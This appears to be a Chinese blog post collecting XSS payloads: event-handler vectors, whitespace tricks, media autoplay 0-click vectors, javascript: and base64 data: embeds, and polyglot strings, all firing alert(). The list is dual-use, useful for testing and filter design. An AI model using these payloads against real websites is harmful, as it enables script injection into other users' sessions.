首页 > 其他分享 >xss Payload

xss Payload

时间:2023-04-06 15:33:32浏览次数:24  
标签:xss DOM 音频 only video audio Payload 视频

十进制值 URL编码 介绍
47 %2F 正斜杠
13 %0D 回车
12 %0C 分页符
10 %0A 换行
9 %09 水平制表符

<svg></p><style><a id="</style><img src=1 one rror=alert(1)>
<svg><p><style><a id="</style><img src=1 one rror=alert(1)>"></p></svg>
<svg/οnlοad=alert(1)> 
<svg

onload=alert(1)><svg> # newline char

<svg	onload=alert(1)><svg> # tab char

<svg οnlοad=alert(1)>   # new page char (0xc) 
<img src=x one rror=alert()>

<svg onl oad=alert()>

<body onpageshow=alert(1)>

<div style="width:1000px;height:1000px" onm ouseover=alert()></div>

<marquee width=10 loop=2 behavior="alternate" onbounce=alert()> (firefox only)

<marquee onstart=alert(1)> (firefox only)

<marquee loop=1 width=0 onfinish=alert(1)> (firefox only)

<input autofocus="" onfocus=alert(1)></input>

<details open ontoggle="alert()">  (chrome & opera only)
事件名称 标签 备注
onplay video, audio 适用于0-click:结合HTML的autoplay属性以及结合有效的视频/音频
onplaying video, audio 适用于0-click: 结合HTML的autoplay属性以及结合有效的视频/音频
oncanplay video, audio 必须链接有效的视频/音频
onloadeddata video, audio 必须链接有效的视频/音频
onloadedmetadata video, audio 必须链接有效的视频/音频
onprogress video, audio 必须链接有效的视频/音频
onloadstart video, audio 潜在的0-click向量
oncanplay video, audio 必须链接有效的视频/音频
<video autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onl oadeddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onl oadedmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onl oadstart="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onl oadstart="alert()"><source src=x></video>

<video controls oncanplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<audio autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>

<audio autoplay controls onplaying="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<object data="data:text/html,<script>alert(5)</script>">

<iframe srcdoc="<svg onl oad=alert(4);>">

<object data=javascript:alert(3)>

<iframe src=javascript:alert(2)>

<embed src=javascript:alert(1)>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczL**yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
            字符            	                使用            	                多段代码            
            141            	                DOM和非DOM            	                javascript:”/*’/*`/*–></noscript></title></textarea></style></template></noembed></script><html \” onm ouseover=/*<svg/*/onload=alert()//>            
            88            	                非DOM            	                “‘–></noscript></noembed></template></title></textarea></style><script>alert()</script>            
            95            	                DOM            	                ‘”–></title></textarea></style></noscript></noembed></template></frameset><svg onl oad=alert()>            
            54            	                非DOM            	                “‘>–>*/</noscript></ti tle><script>alert()</script>            
            42            	                DOM            	                “‘–></style></script><svg onl oad=alert()>  
一些有意思的payload


标签:xss,DOM,音频,only,video,audio,Payload,视频
From: https://www.cnblogs.com/alrights/p/17292902.html

相关文章

  • 02-xss固定会话攻击
    xss学习可以步骤参考:https://www.cnblogs.com/tangtou/p/17281696.html目录原理xss平台cookie窃取和欺骗影响固定会话攻击防御原理用户会话令牌利用cookie来实现,cookie是存储在浏览器端的一小段文本,相当于身份证,会有窃取和欺骗的风险可以利用xss攻击窃取浏览器里的cookie信息......
  • Webug——过滤xss
    同反射型xss相同在url参数id中进行xss攻击http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>不过根据反馈script被过滤了我们就......
  • 项目中如何对XSS统一处理
    XSS攻击是什么?XSS攻击是指攻击者利用网站中的漏洞,向页面中注入恶意脚本,从而获取用户的信息或者控制用户的计算机。举一个通俗的例子,早期使用JSP页面渲染页面的项目,如果将......
  • xss跨站脚本
    跨站脚本(英语:Cross-sitescripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响......
  • wolvctf 2023 zombie xss
    当时做的时候没想到这道题考的是XSS,归结原因在于对nodejs的代码不熟悉。先上源码:bot.js源码就不放了,主要功能概括一下就是点击用户提交的链接,把flag放到cookie里传过去,很......
  • DVWA-XSS(Stored)
    存储型XSS(Cross-SiteScripting)攻击是一种常见的Web应用程序安全漏洞,攻击者在一个网站上注入恶意代码,并将该代码存储在服务器端的数据库中,当其他用户访问该网站的页面时......
  • XSS
    XSS漏洞描述​ XSS攻击全称跨站脚本攻击,是为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全......
  • DVWA-XSS(DOM)
    漏洞详解。DOMXSS(Cross-sitescripting)是一种Web安全漏洞,它利用了浏览器的DOM(文档对象模型)解析机制,通过注入恶意代码来攻击用户。DOMXSS与传统的反射型或存储型XSS有所......
  • springboot防止XSS攻击和sql注入
     文章目录1.XSS跨站脚本攻击①:XSS漏洞介绍②:XSS漏洞分类③:防护建议2.SQL注入攻击①:SQL注入漏洞介绍②:防护建议3.SpringBoot中如何防止XSS攻击和......
  • Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!
    1.XSS跨站脚本攻击①:XSS漏洞介绍跨站脚本攻击XSS是指攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被解析执行,从而达到恶意攻......